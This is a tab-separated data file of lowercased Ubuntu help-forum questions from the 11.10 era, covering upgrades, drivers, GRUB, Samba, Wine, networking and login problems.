86150	will my customized version of 11.10 be broken when i update to 12.04 ?	i installed ubuntu 11.10 for my mother on her computer . i did some little tweaks to make it easier for her : installed gnome shell installed some gnome extensions ( but no shell frippery things ... ) uninstalled/installed some programs like rhythmbox , sound juicer etc . since the 11.10 version of ubuntu is no lts , i was wondering if her system will be fine after an upgrade to 12.04 lts , or if it will be broken . of course , since 12.04 hasnt been released yet , you cant really tell , but mabye you have experiences from previous version upgrades . what do you think - will gnome-shell be affected at all ? it is hard to access her computer , so a seamless upgrade would be very nice ...
86162	scheduling pop up dialogue box - alarm ?	let 's say tuesday december 20 , i need to leave the house at 10 am . i 'd like a pop-up notifier that reminds me ( and stays on the screen until i 've hit `` ok '' ) . what program works best for this ?
86163	evince , mouse wheel does not change pages ( page up/page down behaviour )	my mouse wheel behaves very well only within evince i have the following trouble . when switching into uncontinous view mode , i can not switch to previous page ( mouse up ) nor to next page ( mouse down ) . i use ubuntu 11.10 with evince 3.2.1-0ubuntu2 from offical repos . i though this was not implemented , now the funny thing is , on my laptop also running 11.10 this works ! so where should i look in order to restore desired behaviour ?
86164	how do i fix flash issues ?	i am having problems with adobe flash in ubuntu , what are my options ?
86166	how can i edit gtk+ 3 themes to remove the window borders ?	just like it is in the zukini and zukitwo shell themes , i want to edit the ambiance theme and remove window borders . here are some screenshots : gnome terminal ambiance zukini gvim ambiance zukini
86170	where did my context menus go ?	i 'm running ubuntu 11.10 and just did a software update ( not sure what got updated ) and now my context menus are gone . when i right click on things i see nothing , but can still click around in the dark and make things in the now invisible menu happen ( copy , paste , etc ) . the same is true for the calendar ( when i click the clock ) or application menus ( file , edit , etc ) . even extensions in chrome are no longer dropping down . help !
86172	can you remap super-w ?	i just discovered the super-w keystroke to show all the open applications , but i find the actual keystroke inconvenient and would love to remap it ( say to one of the custom keys on my microsoft 4000 keyboard ) .
86174	how do i create a given network configuration ?	how do i create an eth1 connection with ip address 10.4.6.2 , subnet mask 255.255.255.128 ( /25 ) , with a gateway set as the first available address from the network , and mac address aa : bb : cc : dd:4:6 . i need this set up before ( pre-up ) starting the interface . additionally , i have to create a file in /var/log/journal which keeps track of every ( up and down ) state change of the interface ( adding the event data at the end of the file ) . for example , if i shut down the interface , the file will contain down [ 8-12-10/17:55:30 ] , with the date written in this format : [ day-month-year/hour : minute : second ]
86176	wirless network disabled by hardware switch	i have tried turning on both the physical hardware switch and the fn , f2 and the same problem persists . i am dual booting with windows 7. it works fine with 7 . i consider myself able to navigate most computer problems but not able to write code or completely understand how and where it works . this is my first day with ubuntu .
86178	can not display letters with accents after upgrade to ubuntu 11.10	after updating to ubuntu 11.10 , my system doesn´t accept letters with accents- for example if i want to wrote `` á '' it ends like `` ´a '' . but if i logon with guest account this problem doesn´t exist . is it possible to copy any configuration file from guest account to my account ? any other idea ? thanks
86181	standalone calendar with unity integration	i currently use sunbird , and i like it for the most part , but its support is being dropped and it does n't integrate with unity . i 'm looking for a calendar or personal organizer program which would run in the background as an app in the unity system tray , and notify me of upcoming events without having to be explicitly opened . however , i would rather not have this tethered to a mail client . an easy transition for data from sunbird would be a bonus . suggestions ?
86182	usb tethering with ubuntu 11.10 not working for me	i 'm trying to make work usb tethering on my ubuntu 11.10 . network manager see the devices but it stay grayed and can not be selected . same problem with iphone 4 or galaxy s2 . it used to work under 11.04 . wifi tethering works great . tailing syslog says network manager see the device and try to obtain an ip but only in ipv6 , no request in ipv4 . what i 'm missing ? thanks for any help .
86183	graphics problem on 11.10 install and use : black screen , weird resolution , pointer flickers	i really ca n't find anything that can solve my problem . here it is : i tried to install 11.10 32bits on my dell studio hybrid from cd , but i would directly get a blank screen and my screen would turn off . so i found on the internet the `` nomodeset '' solution ( shift , then f6 ) that let me install the os . after installing , of course , same problem after the first purple screen : just black , screen turns off . i used grub again to use the safe mode , chose in the menu `` resume to boot normally '' and it went fine , i could use my desktop and do the updates , but problems remain : i ca n't boot without using the safe mode ; my pointer flickers every time i go over a button or something ; and my display is stretched and ugly ( ca n't fix it in `` display '' ) . i really ca n't use ubuntu like this . could anyone at least explain to me what the problem is , and maybe help me to have a usable computer ? for info , the only proprietary driver available is for my bluetooth card , and this is my configuration : processor : intel® core™2 duo cpu t6400 @ 2.00ghz × 2 graphics : vesa : intel ( r ) gm965/pm965/gl960 graphics 2.9 gio memory
86184	recurring ntfs input/output error	twice in two weeks , the filesystem table has become corrupted on a ntfs partition . i am able to run ntfsfix and then chkdsk to rebuild the filesystem table . the first time without any loss in data , but the second with significant loss ( in one directory ) . both times , i noticed because certain , but different , folders were suddenly unavailable ( ie input/output error ) . why is this occurring ? what can i do to avoid causing this ? *the setup is windows 7 , an extended partition with linux mint 11 , and the large ntfs partition in question that is used by both systems regularly .
86185	unity bar personal folder icon open a new icon on the unity bar when clicked	since ubuntu 11.10 the personal folder icon of unity bar act differently than 11.04 . in 11.04 , when clicked , it opens a file manager window pointing to the personal folder and it is still associated with the icon ( ie when i click again on the icon , it bring back the opened window at front ) . in 11.10 , it opens the file manager window pointing to the personal folder but associate it with a newly created file manager icon on the bar , so if i click again on the personal folder icon it opens a new window and does not bring back to front the already opened one . is there a way to restore previous behaviour ? ( i have this problem on two different computers ) ... thanks .
86187	how can i share a folder with samba on a ntfs drive on startup ?	on startup , i want a certain folder on an automounted ntfs drive ( mounted on /media/data ) , of which i 've got ownership , to be shared with samba . it should grant access to guests , but they should n't be able to edit or delete the files in there . what is the best way to share a folder with this configuration on samba on startup ?
86190	ssh x11-forwarding gnome-session/lightdm-session	client : ubuntu 11.10 64-bit server : virtualbox ubuntu 11.10 64-bit i would like to start a gnome-session/lightdm-session , but it does n't work . even though i 'm able to start single programs like gedit . does i have to make specific changes to be able to use a gnome-session through ssh ? as far as i have seen in the online tutorials i 've read , all you need is : ssh -x username @ ip gnome-session
86193	command not found when trying to set a format for the time command	i am trying to get the time it takes to run a command , with the output in a specific format : time -f `` % e '' ls -l this is similar to the example in the man page ( and on the online man page ) . however when i run this command i get : -f : command not found it appears as though the time command is not reading the -f as an argument , rather as the command i am trying to run . how can i get the execution time for a command in a specific format ?
86194	jvc gr-d740e + pinnacle 510 usb does n't work	i have a jvc gr-d740e camera with a usb firewire “pinnacle 510 usb rev : 2.0” ( that works on windows xp ) . i 've ubuntu 11.10 in dual boot with windows xp . i 've done some steps with no success : i 've installed kino . i opened kino having the camera opened and in play . when i push the capture button kino returns that the kernel module raw1394 hasn'l loaded . i 've tried with kdenlive that stopped with an error : fatal error . '' `` mlt 's sdl module not found if i do : gp @ gp-desktop : ~ $ dvgrab error : no camera exists i 've tried to find the module : lsmod | grep 1394 no results if i do gp @ gp-desktop : /dev $ modprobe raw1394 fatal : module raw1394 not found . i put the modules needed ( raw1394 , dv1394 , ohci1394 , iee1394 ) in /etc/modules . sudo gedit /etc/modules copying : iee1394 raw1394 video1394 dv1394 and after i 've written a udev rule : sudo gedit /etc/udev/rules.d/40-permissions.rules saving the file with these lines : kernel== '' raw1394 '' , group= '' disk '' , mode= '' 0666 '' kernel== '' dv1394* '' , group= '' video '' , mode= '' 0666 '' kernel== '' video1394* '' , group= '' video '' , mode= '' 0666 '' but after the reboot the modules has n't been loaded yet ( and the same error in modeprobe ) i found , at this point , that i have to load other modules : firewire-core , firewire-ochi and firewire-sbp2 , these are the new modules . i 've installed and putting them into /etc/modules . gp @ gp-desktop : ~ $ lsmod module size used by firewire_sbp2 18414 0 firewire_ohci 35854 0 firewire_core 56937 2 firewire_sbp2 , firewire_ohci the modules has been loaded after the reboot the same error in kino and dvgrab . i 've written a udev rule changing the old module with the new . no results . i do n't know now what i 've to do . any help , please ?
86199	can i make one monitor act like two , split in half	context : ubuntu 11.10 , unity let 's say i have a screen at resolution 1000x500 . what i 'd like to do is split the screen down the middle so [ unity or x or ? ] acts as if there are two displays ( each of 500x500 ) . examples : unity will display a different toolbar ( the top one ) on each side of the display . if i maximize a window on the left side of the screen , it will fill the left side only . if i maximize on the right , it will fill the right . if i hit `` fullscreen '' in youtube ( flash ) or chrome or movie player , it will only fill the side of the display that it 's on . if it 's really is impossible to do this with unity , will it work with gnome3 and how ? a million thanks !
86203	how do i get a dell truemobile 1150 working ?	in case you can not tell i am very new to ubuntu and need assistance . i have a dell truemobile 1150 with the lucent chipset . i need help installing the hermies drivers on my dell inspiron 1100 laptop please . i need as much help as i can get because i am fairly new and want to get this card working right . thanks in advavance does anyone know aything that can help me please ? ! ? ! ? ! ? ! ? i am down to only this card .
86205	after disabling password at login , the system will not accept a password to modify the system . can not install , uninstall , or modify anything . help ?	i have been using ubuntu on and off for a number of years . i have always been a fan . i have been having issues on the new release of 11.10 . i initially installed with a password . then i login and realize that i am typing the password in at every turn . in an attempt to disable the prompt for password i removed the password completely , thinking this would create an automatic pass around the password . however this worked for a number of days , but when i needed to update the system , it prompted me for a password and will not accept either my blank password as it is , or the original one . i have attempted to use passwd 'username ' with no luck ... it gives me a error . now i am receiving a prompt for password every time i want to do anything ... even change date and time . what is happening ? is there a way to reset the password other than the way i have tried ? is there something that i am missing ? any suggestions would be great ! thanks !
86209	quickly run error : run command failed aborting	i have simple pygtk app made with quickly . after syncing source files via ubuntu one and running on other machine i got : $ quickly run ca n't execute bin/myapp error : run command failed aborting but running directly : $ python bin/myapp works . any idea ? can it be ubuntu one messed something ? changin app in glade ( rebuild ) did n't fix nothing .
86212	how do i restrict access to certain web sites ?	i have installed elinks and squid and i need to restrict access to yahoo.com ( including subdomains . for example , fr.yahoo.com ) . how do i permanently configure elinks ( or squid ) to forbid access to yahoo.com ?
86216	brightness is set at max and unable to changed	brightness is set at max and unable to changed.. also cpu always at maximum level..please help ... acer aspire 5750g i7 8gb ram gpu 540gt
86217	how to make the login screen be in portrait mode ?	since i upgraded from 11.04 to 11.10 , my login screen reverted back to landscape mode , and only goes to portrait mode ( what i want ) once i login . how to make the login screen be in portrait mode ?
86221	does ubuntu support radeon hd 6750m or 6490m ?	looking at a samsung series 7 laptop.. anyone know if ubuntu supports amd radeon hd 6490m or 6750m ?
86223	empathy : account manager error `` message did not receive a reply ( timeout by message bus ) ''	i run ubuntu ocelotin italian language and since a week i get a strange error by empathy : '' message did not receive a reply ( timeout by message bus ) '' it seems that telepathy can not contact the account manager , . as said , empathy starts but the most important part of it , the account manager , does n't . i tried to purge empathy and telepathy , to disable its repository with ubuntu tweak , but without results . what do i have to do , i need to use empathy ! greetings , francesco
86225	how do i fix a greyed-out dual monitor on a machine with nvidia graphics ?	i have a dual monitor on my fresh ubuntu 11.10 install . the problem is that it works for a very short time , then the second monitor turns grey . my videocard is a geforce 210 1gb ddr3 and the nvidia-current drivers are activated .
86226	keep the ubuntu package version i 'm using now	i just installed a package ( wine ) . i want to keep this version i 'm using now . how can i disable updates for this package ? thank you in advance .
86227	does gstreamer support the mp3 surround format ?	i am curious if gstreamer can handle playing mp3 surround files . i have a few , but i ca n't get anything special about the file in properties except that it has double the normal kbps ( which is normal for files encoded with mp3sx ) . anyway , if not , does xine or libvlc support it ? thanks
86233	triple boot in my imac ? ( osx lion , windows 7 and ubuntu 11.10/debian 6.0.3	hello to all i have an imac of 21.5 with mac osx lion and have installed windows 7 with the bootcamp . in the previous versions the refit was used but already it does not work : ( since i can install ubuntu/debian in the imac ?
86236	cross-browser bookmark sync ?	is there a way for me to sync bookmarks between firefox and chrome on several different ubuntu machines ? edit : even willing to run something on my own web server if that makes a difference .
86240	laptop running relatively hot playing media	i have an acer 5740dg ( core i5 ) and ubuntu 11.10 . after tweaking a little with the grub workaround and jupiter i do n't have any heating problems anymore . its even cooler than windows . except i 'm playing media . even under audacious it heats 10째 c up . is this normal for such simple audio player ( i have this with every player ) ? i already switched from pulse to alsa , but does n't help . with htop i see that the cpu is n't asked very much . what could be the reason ? thanks !
86241	which graphics driver set is better to test in the long run ?	so , my computer has a radeon mobility card and compiz does n't seem to want to play nice with it . the nets me a tradeoff : i can use the proprietary drivers and get the boosted performance and take a hit to several usability items , or i can use the `` standard '' drivers and take the hit to performance in favor of everything working properly . i also happen to do a lot of alpha testing on a spare partition on this machine . this leaves me wondering , which driver should i be using ? is it more important to get the `` standard '' drivers to actually perform better ? or should i be filing bugs against unity because it does n't work with the proprietary set properly ? or both . what do developers suggest that i run to benefit the project more in the long term ? regardless of what type of graphics card is used . or is that a factor in what set should be used ?
86244	is there a program that can loop a youtube video ?	i would like to loop this video from youtube , it 's ok if it reloads every time although it would be nicer ( and perhaps illegal ) to cache the video . are there any suggestions on software that can do this ?
86254	neat and fast way to count devices in home network	currently i am using nmap wich scans the range of ips that my dhcp server assigns to hosts . however this is a ) slow and b ) sometimes nmaps does n't discover all hosts . laptops that are connected wirelessly sometimes are n't counted . i tried almost all possible nmap scan techniques like : sp , ss , st , sw , sm etc ... they all miss out the laptops sometimes although i can ping them at any time . i am looking for an efficient way to accomplish this without missing out some hosts . my router is a linksys wrt54gl and i am using the latest tomato firmware .
86257	crash plan pro nas ?	i use ubuntu as my nas . i was wondering if anyone has crashplan running and backs up automatically from your mac/pc to a ubuntu device running crashplan ? thinking about the future of my backups . thanks !
86259	is there an ubuntu livecd/usb image that boots directly to low graphics desktop ?	i use ubuntu as a diagnostic tool sometimes , and it would be great to get a modification that lets you boot directly to the livecd desktop , preferably with the special effects dialled down . is there such a tool ? unetbootin does n't seem to let you do this , and remastersys could probably do this , but i 'd have to dig into the code quite a bit and figure out what to remove , which i can do , but i figured someone might have already done this and would save me the trouble .
86264	how to configure gnome-shell extensions installed from the official website ?	i always configure installed gnome-shell extensions from dconf-editor , but after installing extensions from the official site i could n't configure the installed extensions from the official site ( i did n't found the them in dconf-editor under org > > gnome > > shell > > extensions ) .so how to configure installed extensions from the official site ? ? ?
86270	radiotray -- resume not working	when executing radiotray -- resume it will give the output below , which basically says that -- resume is loaded as being an url and not as argument . trying to load url : -- resume loading configuration ... /home/roel/.local/share/radiotray/bookmarks.xml /home/roel/.local/share/radiotray/config.xml /usr/share/radiotray/config.xml pls playlist decoder m3u playlist decoder asx-familiy playlist decoder xspf playlist decoder asf playlist decoder ram playlist decoder using url timeout = 100 /usr/lib/python2.7/dist-packages/radiotray/lib/utils.py:40 : gtkwarning : ia__gtk_radio_button_set_group : assertion ' ! g_slist_find ( group , radio_button ) ' failed ui.add_from_file ( join ( common.default_cfg_path , name ) ) user chose app indicator ^ctraceback ( most recent call last ) : file `` /usr/bin/radiotray '' , line 15 , in < module > radiotray.main ( sys.argv [ 1 : ] ) file `` /usr/lib/python2.7/dist-packages/radiotray/radiotray.py '' , line 35 , in main radiotray ( argv [ 0 ] ) file `` /usr/lib/python2.7/dist-packages/radiotray/radiotray.py '' , line 90 , in __init__ self.systray.run ( ) file `` /usr/lib/python2.7/dist-packages/radiotray/systray.py '' , line 447 , in run gtk.main ( ) keyboardinterrupt update if found that everytime i start radiotray from the commandline the 'first start ' dialog is popped . maybe this is an hint to what is wrong ?
86278	how do i repair a broken skype group chat ( window ) ?	i am using ubuntu 11.10 and skype 2.2.0.35 . everything was working just fine and then suddenly one of the group chat windows , to a group chat i always use , goes missing . i of course go to reopen it by double clicking the entry in the history list , but that does nothing . i try the same thing on another group chat 's entry/row in the history list and that group chat 's window comes right up . i look around my workspaces for a while , trying to get to it . i try clicking on an event notification ( window ) when someone in the group chat types something ( because this normally brings up the group chat window ) and nothing . i try tinkering with the settings . i try closing skype and opening it again . i try uninstalling and reinstalling skype . i try uninstalling , rebooting and then reinstalling again . perplexed , i decide to install compizconfig settings manager after reading it allows the user to move windows . ( my thinking was that the group chat window might be opening up in some unreachable space and i can move it to the center of my screen with the compizconfig key combo . ) i try it to no avail , although it works great with all windows i can see . at this point i am starting to really accept that something is seriously wrong with some information that skype is storing for the group chat and that the window just does not launch . my next idea to fix this is to reset all local skype settings , but i am not sure how . is there a hidden folder in my home directory or something ?
86280	how do i install ibm access ?	i 'm trying to figure out how to install ibm iseriesaccess_7.1.0-1.0.x86_64.rpm on ubuntu 11.10 . i 'm very new to linux , but understand that i needed to run the alien command to convert the rpm to a deb file . iseriesaccess_7.1.0-1.0_amd64.deb was the result of me running the alien command . i thought ibm5250 would launch the program , but that does n't seem to be working . if someone could please list the proper way to install ibm iseriesaccess_7.1.0-1.0.x86_64.rpm and the command to get it running i would appreciate it . i have followed the instructions given here but nothing happens when i try gksudo /opt/ibm/iseriesaccess/bin/launch5250 . i 'm not so sure this method works for ubuntu 11.10 .
86281	how do i copy over settings from persistent usb to installation on harddrive ?	so i just installed ubuntu 11.10 to my main hard drive . i have a couple of questions . the main question being , how do i copy over all the programs and settings from the persistent usb that i got settled in with , to the new hard drive install ? second question/scenario : i had a 160gig as my main . power flickered on and off really rapidly the other day . pc is fine , slaved 40 gig was fine , but now the 160gig sounds like it has sand in when i shake it . pc wont recognize it at all . so i 've made the 40 gig my main for now . i have another 20 gig , but cant get them to both be recognized by the comp . tried putting them on two different ide cables . i 'm a little confused on what i should have the jumpers set to . i tried setting the 40 gig 's jumper to master , and the 20 gig to slave , but the pc does n't like it . basically what i 'm asking for is some advice on the jumper settings . both of these are small , old drives . that 20 gigs more is a blessing on this old piece of junk . could really use some advice please .
86283	wake up from sleep on hp envy 14	i 'm not familiar with laptop power management internals , and i have a bit of a problem with ubuntu 11.10 and hp envy 14 . waking up from sleep ( opening the lid ) causes a cooler to spin on maximum speed , it becomes really loud and unpleasant . where should i start looking ? i suppose one of the devices can start sucking power on wake up ?
86285	chrome download interrupted leaving `` .crdownload '' temporary file	i am using google chrome 15.0.874.121 in ubuntu 10.10 . it was fine until recently . whenever download a file , it always reports `` interrupted '' , but it actually finishes the downloading , leaving an intermediate file with extension `` .crdownload '' . if removed the extension , the file will be perfect . note that downloading in firefox works fine at the same time . so i wonder if it is a bug or how i can fix it ? thanks and regards !
86286	booting ends with blinking caps lock indicator light on a packard bell mb87	after a clean install of ubuntu 11.10 , i have been faced with a crash several times . when i push the computer 's power button , it starts to boot as usual , but suddenly it freezes and all i see is a pink screen and a flashing caps lock indicator light . is there anybody who knows what to do to prevent this from happening ? it 's a packard bell mb87 , my graphic card is nvidia geforce 8600 gs and i have installed the system via livecd .
86289	black screen after installation	i have an acer laptop with a intel gma4500mhd graphic card , after the installation of ubuntu from an alternate install cd i get only a black screen after the grub selection pages . i tried something in this page and i still have the problem . i have tried with debian testing and i have the same problem , it was alright on older ubuntu and with debian squeeze . i think that the kernel update includes some new drivers incompatibles with my graphic card . any suggestion ? thank you very much-
86290	ccsm missing from unity	after using ccsm 4 or 5 weeks ago to adjust the launcher icons to minimum setting i have been spending all my time in gnome shell . i have made a number of adjustments in shell ( tweak tool etc ) today i loaded unity to make some adjustments via ccsm but found that it was missing altogether - ie would not load when entered in search box . ccsm also does not show up in synpatic . unity is working o.k . with no other problems . could somebody explain where ccsm has gone and how to restore ? thank you .
86294	how do i uninstall old kernel options listed in grub2 ?	i installed ubuntu tweak in ubuntu 11.10 , went to janitor , and selected and removed old kernels that appeared there ( 3.0.0-12 ) . now , the only installed linux-image that appears as 'installed ' in spm is the most recent one ( 3.0.0-13 ) , which is the one i want . it did not however eliminate the kernel listing in grub 2 . at boot : however , at boot , in grub-2 , the following options still appear : 3.0.0-13-generic 3.0.0-13-generic ( recovery mode ) 3.0.0-12 ( generic ) ( on /dev/sde5 ) 3.0.0-12 ( generic ( recovery mode ) ( on /dev/sde5 ) and , in terminal , when i change directory ( cd ) to /boot , and then list ( ls ) , i get the following listed kernels : 3.0.0-13 2.6.38-12 2.6.38-8 ( al there is no change when i sudo update-grub in terminal 1 ) what is /dev/sde5 , and where is it located in the file system , so i can delete it ? 2 ) why the differences between what appears as installed in spm , what appears at boot in grub2 , and what shows when i list the contents of grub2 in terminal ? ultimately , i simply want to remove the 3.0.0-12 kernel options at boot in grub2 . how do i best and simplest do that ? thanks again donofrij is online now report post edit/delete message reply with quote multi-quote this message quick reply to this message
86298	how can i reinstall the boot loader ?	i 've just installed windows 7 , and i ca n't access ubuntu any more . is there any way i can install the boot loader without reinstalling ubuntu all over again ? ?
86299	setting up boot dvd	i am interested in setting up a boot dvd , a dvd from which i can boot , containing a kernel which is compatible with ubuntu . is this a reasonable thing to attempt ? is there a command i can use which will generate such a dvd ?
86301	how to install asus ' ai suite ii program ?	i 'm unable to install the `` amd a75 fch chipset support dvd rev.887.01 '' installation disk include with my asus f1a75-m pro motherboard . i 'm running ubuntu 11.10 64 bit . i 've tried using the program `` wine windows program loader '' to run the disk , with success but when i try to install the asus ai suite ii program i receive a message saying `` load asio error '' . asked for support from asus directly but they simply replied that they do n't support linux os ' . the ai suite ii program is the only thing i 'm interested in on the disk .
86303	change the color of grub back to the default ubuntu colors	i installed kubuntu-desktop and it changed the boot stuff . i fixed the bootsplash with update-alternatives -- config all . now , how can i fix grub 's background color ?
86305	how to remove notification popups for banshee ?	i ca n't stand it when banshee tells me a new song is playing . i know what i 'm playing , so i do n't need it to tell me . : ) how can i disable the notification popups ?
86307	dns not resolving in ubuntu 11.10 liveusb	first off , my laptop is a pos , so i have n't ruled out a hardware malfunction , but in the hopes that i do n't have to have the wifi component replaced along with the failing hard disk , i 'm making the assumption that maybe something is wrong with my configuration of ubuntu 11.10 . also , i 'm a programmer and i know basic things like ping , ifconfig , and pretty basic terminal commands , but i 'm still really new to ubuntu . my problem is my laptop ca n't surf the net . i 'm running ubuntu 11.10 via liveusb , and connect to the internet via a wifi connection . i know it 's not the connection itself because other laptops manage to connect and surf the web . i doubt it 's the connection to the router because i manage to access the router 's config page by entering 192.168.2.1 on the address bar of firefox . i 've tried to access the internet via my home connection and my schools ' connection ( the proxy for this connection was configured ) , but both attempts failed . i also tried playing with the checkboxes in the ipv4 and ipv6 tabs of the network settings with no luck . firefox just keeps saying i ca n't access the net . i 've also tried pinging google , but it says it ca n't find the server server can not be found . i 'm pretty sure it 's a dns issue because i managed to access google.com by entering their ip address : 74.125.235.19 . it loaded the page , but failed to load the links . i did a port scan on 127.0.0.1 and it reports one open port , 6xx ( i ca n't remember which port exactly ) . i checked my resources , and it shows small network transfers , but that 's all . i have no idea what other settings i can tweak , so any advice on how to fix this would be appreciated . edit : i connected to the wifi at the office . it still wo n't work , but i managed to ping 8.8.8.8 in ~50 ms running ip route show printed the following : 169.254.0.0/16 dev wlan0 scope link metric 1000 192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.121 metric 2 i do n't know what any of that means .
86310	core i7 installation problems	first of all i tried booting from both usb , cd and dvd , as well as installing from windows , as well as trying both 32 and 64 bit versions , however nothing works for some reason . trying ubuntu works , but it takes approximately 20 minutes to load and when it does it works fine . in ubuntu when i try to install onto a hard drive it takes again 20 minutes to prepare for installation . when it does it does not recoginise that i am connected to the internet and says x is conected to internet although i am connected via wired network and i am posting this question . it stays for hours at the screen where you must choose the partitions as i can remember cause i turned it of when i saw it was loading over 30 minutes and restarted my pc . i tried both 32 and 64 bit version same results . specs : intel core i7 2.8ghz x8 12 gigs ram nvidia 480gtx i dont remember the motherboard but it was a expensive one i dont believe it is my computers fault . it works in windows like a charm . what may be the problem ? are some drivers not compatible ?
86311	on 10.04 lucid , how can i add a script to startup to run as another user ?	on 10.04 lucid , how can i add a script to run at startup as another user ? will i add a script someplace like /etc/init.d/myscript ? or is it better to put it in the cron file for root as @ reboot and the exec command ? or something completely different ? i 'm new to this ( sorry ) but i have been googling without much luck . links to tutorials would be fine as well , i 'm just feeling a little lost not knowing where to start ...
86315	permissions issue uploading to server via ftp client despite user having all permissions	i set up a new ubuntu server with one user to whom i granted full permissions by adding jsmith all= ( all ) allto the /etc/sudoersfile . the idea being that i would be able to never log in as root and use jsmith all the time for the day-to-day administration of the server . i want to use coda to upload files to the server , logging in as jsmith rather than root . unfortunately , when i log in to the server under sftp using root , i can upload files without issues . if i log in as jsmith , i can connect to the server and navigate all the way up to its root , but if i try to upload a file i get an error [ screenshot here : http : //i.via.dj/crvh ] i suspect i 've overlooked something in the configuration , but despite googling the issue i have n't been able to find a solution . any suggestions welcome .
86320	how to convert video_ts folder to video format	i have a movie directory with a sub directory video_ts in it . i want to convert this to a video file like avi , mp4 , etc ... how can i convert this ? right now i can see it with vlc of course but i want to have it as a one file video format .
86322	how to add right click print option to libreoffice files in nautilus	i was wondering if it could be added to the right click menu an option to `` print '' the file without the need to open it and then print it .
86324	changing default applications does n't work in system settings or on file types	despite several attempts at a solution , i still ca n't change the default applications in ubuntu 11.10 . if i change them in system settings they revert back as soon as i close the dialogue . next time i open the settings , default applications have reverted back to the standards . if i right click a file and try to choose a default application there i get an error message saying `` ca n't create user application configuration folder '' etc etc . i am logged in as the only user created , so i should have rights to change these settings , should n't i ?
86327	migrating wubi to a real partition	i have three partitions , /dev/sda1 file system : ntfs mount point : /media/system reserved size : 100 mib free : 42.88 mib flags : boot i assume this to be the windows boot loader /dev/sda2 file system : ntfs mount point : /media/6a1032d21032a54b size : 146.39 gib free : 95.11 gib flags : which contains the windows 7 installation /dev/sda3 file system : ntfs mount point : /host size : 319.28 gib free : 289.18 gib flags : which contains only the 30 gib wubi install of ubuntu . what i want to do is , shrink windows to be only 100 gib add the extra space onto /dev/sda3 take some of that extra space and use it to create swap space take the 30gib wubi install and put it onto /dev/sda3 using the entire space . have a still functioning ubuntu and windows . i am looking at using this forum post which uses wubi-move-2.1.sh so my questions are : if i was to use : sudo bash wubi-move-2.1.sh /dev/sda3 would that work or fail as it is the same partition as the virtual disk is on ? obviously that would create it without swap as well , would i be safe to in gparted from the wubi install resize /dev/sda1 and create /dev/sda4 as swap ? or would that kill my windows 7 install ? if i did as mentioned above , could i resize /dev/sda3 from gparted from within the wubi install as it is the partition with the virtual disk for wubi ? with the assumption of nothing going wrong with the above , or of course booting off the live ubuntu cd would this procedure work : in gparted : resize /dev/sda2 to 100.00 gib resize /dev/sda3 to 355.67 gib create /dev/sda4 with 10gib ( i have 4gb ram ) run sudo bash wubi-move-2.1.sh /dev/sda3 /dev/sda4 or sudo bash wubi-move-2.1.sh -- root-disk=/media/whatever_mounted_as/root.disk /dev/sda3 /dev/sda4 if run from live cd
86329	why is my cpu usage over 90 % ?	as i am new to ubuntu and moved from windows i was wondering that my cpu use which was 2 to 3 % in windows during ideal state is above 90 % i am using ubuntu with kde interface . can be it is due to installation of kde ? i have installed kde-standard from the ubuntu software center . i have dell 15r with i3 , 3gb ,320gb i have dual boot as windows 7 as a host .
86331	can not access trash folder in fresh install !	i have been searching around for about a half an hour and can not seem to find the answer to this problem ... i just recently did a fresh install of ubuntu 11.10 after deleting an install that used wubi to dual boot with windows . all i did since i installed was delete windows partitions off my second hard drive . i just went to startup nautilus and found out that both the `` move to trash '' and even the `` delete '' command when enabled are blacked out . i then tried to click on it through nautilus and it gives me an error.. the folder contents could not be displayed . sorry , could not display all the contents of `` trash '' : the specified location is not supported i already tried creating the folders under .local/share/trash and nothing has worked yet . i also already tried changing permisions and a few other things and nothing has worked . i believe that the location is probably wrong somewhere but can not figure out where this is or how i can change it . thanks in advance for your help .
86332	how can i find my password ?	so i installed xubuntu on a netbook with windows 7 already on it . install seemed to go fine , boot works fine with proper dual boot options ; but at the login screen , options are the same main account from the windows install , plus guest or other . there was never a prompt for adding users , or setting a password ; xubuntu seems to have just lifted the login name from the windows install . however ; it wo n't take the password that is associated with that ( the only ) named account . i tried enter with no password , assorted combinations of 00000 and 1234 , etc , caps lock on and off with the windows password , no dice . as guest , i cant sudo anything , or do anything `` administrator '' level -- it wo n't even let me attach to a wireless network . everything else seems to be just fine , the os seems to recognize all my devices , sees my wireless network , looks nice , all that good stuff -- i just ca n't do anything without a password . any ideas or suggestions ? the install went surprising flawless and without any hesitation , no prompts , no hangups , questions . it installed automatically and easily . the only thing that was perhaps different from a `` normal '' way of doing is , was it was installed from .iso mounted in a virtual clone drive . i was surprised it worked so easily , except for this little glitch . another kinda odd thing , was i downloaded the lubuntu iso , from the lubuntu site , but at the beginning of installation , it only offered me start an install of ubuntu , kubuntu or xubuntu . odd ... so i just went with xubuntu , figured i 'd just apt-get lubuntu-desktop later .
86333	using function keys for switching applications	is there any way to use some of the function keys on the keyboard for switching to an application ? for example , i want to use f5 key to switch to google chrome and f6 key to firefox etc . just to be clear : i do n't want to launch an application using those keys . i want to bring the already running application to the front ( i do n't care if they launch the application if they are n't already running . it 's a plus , however not necessary ) .
86335	installing other fonts on wine	is there a way to install fonts on wine ? i 'm looking to install fonts so i can use them to render text differently on various apps . specifically myriad .
86337	how to change kernel order in boot menu	i have 4 kernels in my grub . i want to make my third kernel the first one . how to do it ?
86338	enabling pdf preview in dolphin	h系llo everyone . i have installed kde on my ubuntu 11.10 install . it 's working nicely except for a couple of gripes with dolphin file manager . it seems much slower than other file browsers . any particular reasons for this ? any way how i could speed it up ? i want to enable pdf preview for dolphin . on googling a bit , i found a page that suggested following command : sudo apt-get install kdegraphics-strigi-plugins the preview does n't work for me even after i ran the above command . how do i make it work ? thanks .
86339	how can i set histsize for all users ?	how can i set histsize for all users on ubuntu 10.04 ? i 've tried adding the following lines to both /etc/profile and /etc/bash.bashrc . i 'm not sure i understand the difference between the two files but i really think either one should work on an interactive shell , right ? export histcontrol=erasedups : ignorespace export histsize=5000 shopt -s histappend for some reason this wo n't work though . i have added the lines to the bottom , logged out , logged back in , and typed echo $ histsize and i get `` 1000 '' ? what am i doing wrong ?
86340	windows 7 partition not detected during installation	i just downloaded ubuntu 11.10 . when trying to install it , surprisingly i saw that it did n't detect my windows 7 hp sp1 . i have this windows pre-installed on my net-book . can anyone help me with this problem ?
